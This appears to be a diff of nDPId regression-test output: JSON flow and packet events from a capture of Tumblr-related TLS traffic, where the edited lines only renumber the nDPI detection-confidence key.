-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 
00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} 
@@ -26,54 +26,54 @@ 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} 
-00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} 
00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} -00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} 